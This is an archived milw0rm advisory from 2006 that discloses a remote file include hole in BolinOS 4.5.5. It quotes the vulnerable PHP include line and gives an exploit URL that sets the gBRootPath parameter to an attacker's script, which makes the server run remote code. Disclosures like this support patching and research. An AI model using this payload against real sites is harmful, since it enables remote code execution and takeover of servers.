AOH :: HP Unsorted B :: B06-4754.HTM

BolinOS v.4.5.5 <= (gBRootPath) Remote File Include Vulnerability



BolinOS v.4.5.5 <= (gBRootPath) Remote File Include Vulnerability
BolinOS v.4.5.5 <= (gBRootPath) Remote File Include Vulnerability



=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+BolinOS v.4.5.5 <= (gBRootPath) Remote File Include Vulnerability
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Author: xoron (turkish hacker)
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Class : Remote
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Vuln Code: include ($GLOBALS["gBRootPath"].$GLOBALS["gBSysPath"]."/system/_b/contentFiles/gBLib.php");
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Exploit: http://www.site.com/[script path]/system/_b/contentFiles/gBIndex.php?gBRootPath=evil_scripts?
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+ Thanx : str0ke, Ironfist, Preddy, SHiKaA, mdx, g=FCltekin, R3D4C!D, DaRK, insomnia, mirim, Dreamlord,
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=

# milw0rm.com [2006-09-15]


The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.